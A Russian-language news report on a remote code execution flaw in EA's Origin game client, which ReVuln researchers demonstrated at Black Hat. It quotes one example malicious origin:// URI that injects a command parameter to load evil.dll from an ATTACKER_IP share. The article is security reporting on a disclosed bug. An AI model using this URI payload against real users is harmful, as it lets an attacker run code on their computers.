Более 40 миллионов пользователей рискуют стать жертвами новой уязвимости в онлайновой игровой платформе Origin компании Electronic Arts. На конференции Black Hat был показан эксплойт для Origin. Он позволяет исполнять посторонний код на компьютере пользователя. Сама клиентская программа Origin выполняет роль «троянского коня», который позволяет злоумышленнику проникнуть в систему.

Уязвимость обнаружили двое хакеров из компании ReVuln, которые уже неоднократно попадали в новости в связи с найденными багами в самых разных устройствах и приложениях: системах SCADA, телевизорах Samsung, игровой платформе Steam.

Уязвимость в Origin похожа на вышеупомянутую уязвимость в протоколе Steam. Она связана с некорректной обработкой Origin URI. Это позволяет злоумышленнику составить такой URI, который приведёт к удалённому исполнению кода на компьютере локального пользователя. Например, для активации игры в протоколе используются ссылки вроде origin://LaunchGame/71503, но при этом можно передавать ссылки такого вида: origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, так что жертва подгрузит с сервера злоумышленника на исполнение вредоносную библиотеку.

Описание бага см. в докладе (pdf), который авторы опубликовали перед конференцией. Есть также демонстрация на видео.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии